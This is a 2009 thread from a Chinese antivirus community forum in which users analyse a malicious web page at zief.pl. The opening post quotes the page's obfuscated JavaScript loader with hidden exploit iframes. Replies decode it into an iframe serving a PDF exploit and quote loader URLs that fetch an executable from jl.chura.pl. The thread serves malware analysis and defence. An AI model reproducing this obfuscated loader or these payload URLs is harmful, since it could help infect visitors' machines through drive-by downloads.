瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » http://www.zief.pl/iraq.jpg/
networkedition - 2009-7-1 14:13:00


引用:

<iframe src="sploits/i1.html"></iframe><iframe src="sploits/f2.html"></iframe><html><body><script>function onerrorpage(){return true;}</script><style>.nsrle{display:none;}</style><div class="nsrle"id="sfd">1e2v345a6l</div><script>window.onerror=onerrorpage();</script><b class="nsrle"id="nsrle">100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.34.60.105.102.114.97.109.101.32.115.114.99.61.39.104.116.116.112.58.47.47.106.108.46.99.104.117.114.97.46.112.108.47.114.99.47.112.100.102.46.112.104.112.39.32.119.105.100.116.104.61.49.32.104.101.105.103.104.116.61.49.32.102.114.97.109.101.98.111.114.100.101.114.61.48.62.60.47.105.102.114.97.109.101.62.34.41.59</b><script>var g=document.getElementById('sfd').innerHTML.replace(/[\+123456]/g,"");var extJS=eval(g);var s=document.getElementById("nsrle").innerHTML;s=s.replace(/[A-Za-z]/g,function (c){returnString.fromCharCode((((c=c.charCodeAt(0))&223)-52)%26+(c&32)+65);}).split(".");var p="";for(var i=0;i<s.length;i++){p+=String.fromCharCode(s);}extJS(p);</script></body></html>



用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
shadowmin - 2009-7-1 15:40:00
document.write("<iframe src='http://jl.chura.pl/rc/pdf.php' width=1 height=1 frameborder=0></iframe>");
不过下载不下来。
networkedition - 2009-7-1 15:43:00
的确是,失效了:kaka12:
kekao - 2009-7-1 16:09:00
不是失效了.而是你的代码获取不全的原因.后面还少个id=数字.
国外的load.exe
document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=546983' type='application/pdf'></embed>";
break;
}
}
var url="http://jl.chura.pl/rc/load.php?id=546983"

http://jl.chura.pl/rc/load.php?id=546983&spl=3
http://jl.chura.pl/rc/load.php?id=546983&spl=2
还有swf.下载都一样.
shadowmin - 2009-7-1 16:15:00
想起来了,这个得用神器才能得到完整代码,用freshow的话,得到的代码是不全的。
这个的代码的网址是什么?
可否发布一下?
kekao - 2009-7-1 16:17:00
标题不是有吗
shadowmin - 2009-7-1 16:20:00
嗯,我笨的可以。:kaka4:
networkedition - 2009-7-1 16:21:00
freshow果真没有获取到完整代码。
networkedition - 2009-7-1 16:22:00
不仔细呀,源地址都给了。:kaka12:
1
查看完整版本: http://www.zief.pl/iraq.jpg/